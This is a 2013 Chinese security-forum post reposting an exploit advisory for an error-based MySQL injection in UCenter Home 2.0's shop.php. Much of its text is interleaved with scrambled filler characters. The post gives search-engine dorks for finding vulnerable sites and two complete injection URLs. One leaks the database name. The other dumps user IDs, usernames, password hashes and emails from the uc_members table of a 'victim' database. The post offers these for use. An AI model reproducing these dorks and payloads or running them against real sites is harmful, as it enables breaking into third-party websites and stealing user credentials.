找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2135|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* h, }& Y* ^+ H3 E  }2 Q__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  ( T& u( W: {* n7 K# y
4 c4 h# l" j; U* V
                                 7 k7 C. E3 k- h/ A) w6 `

0 W4 K& z% z3 S4 W*/ Author : KnocKout  # q1 P5 x5 J+ O
7 C' h8 z8 x. Y* |
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  6 c* y$ W6 d5 \
3 q; g$ F+ i( M4 s! J$ W/ i, ~
*/ Contact: knockoutr@msn.com  0 m2 t# O9 f+ Y8 `& z
# r: |# {% O9 M. k6 z2 p7 i2 G
*/ Cyber-Warrior.org/CWKnocKout  
9 S% M% H. y4 _0 A, J6 e& N/ y$ k- v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  * I7 ^% L+ q, X% ^) Q( m% U

+ \9 p+ Z! D4 v% j3 U* tScript : UCenter Home  
& l* S9 F% i: ~; D+ ?
5 r1 T+ u4 H: RVersion : 2.0  
& g' q& z" W' n! P8 U" N
6 y, u. i) o6 [$ sScript HomePage : http://u.discuz.net/  7 U4 u, ]5 E; V' \) m: w# p
1 d2 t* Y% T3 Y3 f; l/ q1 o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
" g3 `  n& C( P3 R& ]- }; c( v
5 Z% _" _# E% t" V- o" n+ l2 FDork : Powered by UCenter inurl:shop.php?ac=view  " t# R, ~" w% ?# ^, s4 G
3 K* s' |; P2 E; l" X7 p) E0 y
Dork 2 : inurl:shop.php?ac=view&shopid=  
1 u3 Z: |" O( t  B3 M, f# Q
) D+ M9 h# O8 a& |0 C! N9 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  2 S8 L9 h1 ]9 E1 S' n$ `4 Y

2 q6 X2 ^; F. N5 ZVuln file : Shop.php  * R9 E0 g8 q) z

# \& s8 Z5 o' ^value's : (?)ac=view&shopid=  ( [; |2 `1 l: W( p* w. s4 V, R

1 w4 k9 j, _% p: j. BVulnerable Style : SQL Injection (MySQL Error Based)  / P3 ~1 a( H5 {5 O3 m8 X+ J
# H2 c8 q' w. H) y
Need Metarials : Hex Conversion  ) [! {/ M- ^+ _( \6 o. k% E
2 l! |# g! H& j: d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  * p9 K; ]0 W% t
2 Y8 }4 p+ b7 z+ v" t  ]% v. v
Your Need victim Database name.   
8 w2 B- Y- J0 h3 C% ]; x/ h" G' |7 S6 R; k6 ~
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
6 f( {" n* x- P: E* a6 n6 u* G7 B& y6 t' Q1 ], v; R
..  
9 y, e! k+ F- W9 J
; ]" \( D( j- v) ^/ @! |9 jDB : Okey.  
( `+ M: H" Q0 E" d
/ P& @; D3 \" e/ O: H0 @your edit DB `[TARGET DB NAME]`  ) _) L, ]5 I2 T. e
% {9 S( u4 m; K8 ?  N
Example : 'hiwir1_ucenter'  
- i+ W0 C: Y1 e+ V! \# c
) ]* k9 p8 v) D, J; FEdit : Okey.  " R! ?8 V6 {% z& p0 J
0 W+ y8 g; T  o' x! u
Your use Hex conversion. And edit Your SQL Injection Exploit..  ) e+ ]; V$ P/ E0 x2 _

% r: p. r* s8 B1 t! h   
7 x7 f# F5 G# P: a+ X) F5 [- ?% g" I" p* c& i" h
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
  U6 R! P# K( m8 |' O! H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表